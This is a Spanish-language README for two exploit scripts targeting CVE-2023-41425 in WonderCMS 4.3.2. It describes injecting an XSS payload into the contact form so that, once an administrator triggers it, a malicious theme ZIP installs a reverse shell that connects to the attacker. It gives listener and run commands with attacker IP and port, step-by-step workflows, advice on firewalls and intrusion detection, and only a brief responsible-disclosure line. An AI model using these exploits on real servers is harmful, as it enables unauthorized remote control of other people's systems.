
WonderCMS 4.3.2 Exploits XSS a RCE
Resumen
Estos scripts explotan una vulnerabilidad XSS (Cross-Site Scripting) en WonderCMS 4.3.2 para lograr Ejecución Remota de Código (RCE). El payload XSS, cuando es activado por el administrador, instala automáticamente una reverse shell en el servidor objetivo aprovechando un módulo de tema malicioso diseñado. La reverse shell se obtiene de revshells.com y se ejecuta, otorgando al atacante acceso remoto al servidor.
Tabla de Contenidos
Requisitos previos
Para ejecutar con éxito cualquiera de los scripts, se requieren las siguientes herramientas y condiciones:
- Bash Shell: Ambos scripts están escritos para entornos Linux usando el shell Bash.
- netcat (nc): Se utiliza para escuchar la conexión de reverse shell.
- Python3: Se utiliza un servidor HTTP simple de Python para alojar el payload XSS.
- WonderCMS 4.3.2: El objetivo debe estar ejecutando una versión vulnerable de WonderCMS.
- Interacción del administrador: El payload requiere que un administrador active el XSS, lo que resulta en la ejecución de la reverse shell.
- revshells.com: El payload de reverse shell se descarga dinámicamente de revshells.com.
Script 1: Exploit Automático
POC
Pasted image 20241010021603
Características
Esta versión del exploit verifica automáticamente si hay un listener nc activo, descarga la reverse shell, inicia el servidor HTTP, envía el payload y espera a que el administrador active la reverse shell.
- Configuración automática de reverse shell: Descarga una reverse shell pregenerada de revshells.com.
- Inyección de payload XSS: Inyecta un payload XSS en el formulario de contacto del objetivo.
- Gestión del servidor HTTP: Inicia automáticamente un servidor HTTP Python para alojar el payload de reverse shell.
- Verificación del listener nc: Asegura que el listener esté funcionando antes de continuar.
- Envío automático del payload: Envía el payload automáticamente sin interacción del usuario.
Uso
- Asegúrate de que el listener
nc esté ejecutándose en el puerto especificado:
nc -nvlp <PORT>
- Ejecuta el script con el siguiente comando:
./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
Ejemplo:
./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
Flujo de trabajo
- Descargar reverse shell: El script descarga la reverse shell desde
revshells.com.
- Modificar la reverse shell: El script de reverse shell se actualiza con la IP y puerto del atacante.
- Crear payload ZIP: Se crea un archivo ZIP que contiene la reverse shell.
- Elaborar payload XSS: Se genera un payload XSS que instala la reverse shell y se inyecta en el formulario de contacto vulnerable.
- Iniciar servidor HTTP automáticamente: El script inicia un servidor HTTP Python para servir el payload malicioso.
- Enviar payload automáticamente: El payload XSS se envía al administrador automáticamente.
Script 2: Exploit Manual
POC
Pasted image 20241010013048
Usa el exploit proporcionado por el script en el campo Website...
Pasted image 20241010013218
Características
Esta versión requiere que el usuario administre manualmente el listener nc y la activación del payload XSS. Es más adecuada para escenarios donde los procesos automáticos no son deseables.
- Configuración manual de reverse shell: El usuario es responsable de asegurar que el listener esté funcionando.
- Activación manual de XSS: El script proporciona el enlace malicioso para enviar al administrador, pero el payload debe activarse manualmente.
- Gestión del servidor HTTP: Inicia un servidor HTTP Python para alojar el payload XSS.
Uso
- Asegúrate de que el listener
nc esté ejecutándose en el puerto especificado:
nc -nvlp <PORT>
- Ejecuta el script con el siguiente comando:
./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
Ejemplo:
./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
Flujo de trabajo
- Descargar reverse shell: Descarga una reverse shell desde
revshells.com.
- Modificar la reverse shell: Actualiza la reverse shell con la IP y puerto del atacante.
- Crear payload ZIP: Crea un archivo ZIP que contiene la reverse shell.
- Elaborar payload XSS: Genera un payload XSS que instala la reverse shell.
- Mostrar enlace malicioso: Muestra el enlace que debe enviarse al administrador para su activación.
- Iniciar servidor HTTP: Inicia un servidor HTTP Python para alojar el payload.
Notas
- Interacción del administrador: Ambos exploits dependen de que el administrador de WonderCMS active el payload XSS visitando la página vulnerable. Una vez activado, se establece la reverse shell con la máquina del atacante.
- Firewall/IDS/IPS: Ten cuidado al ejecutar estos exploits en entornos protegidos por firewalls o Sistemas de Detección de Intrusos (IDS) que podrían bloquear o alertar sobre actividad sospechosa.
- Divulgación responsable: Si encuentras que un objetivo es vulnerable, sigue siempre las pautas éticas y reporta la vulnerabilidad a las partes correspondientes.
Licencia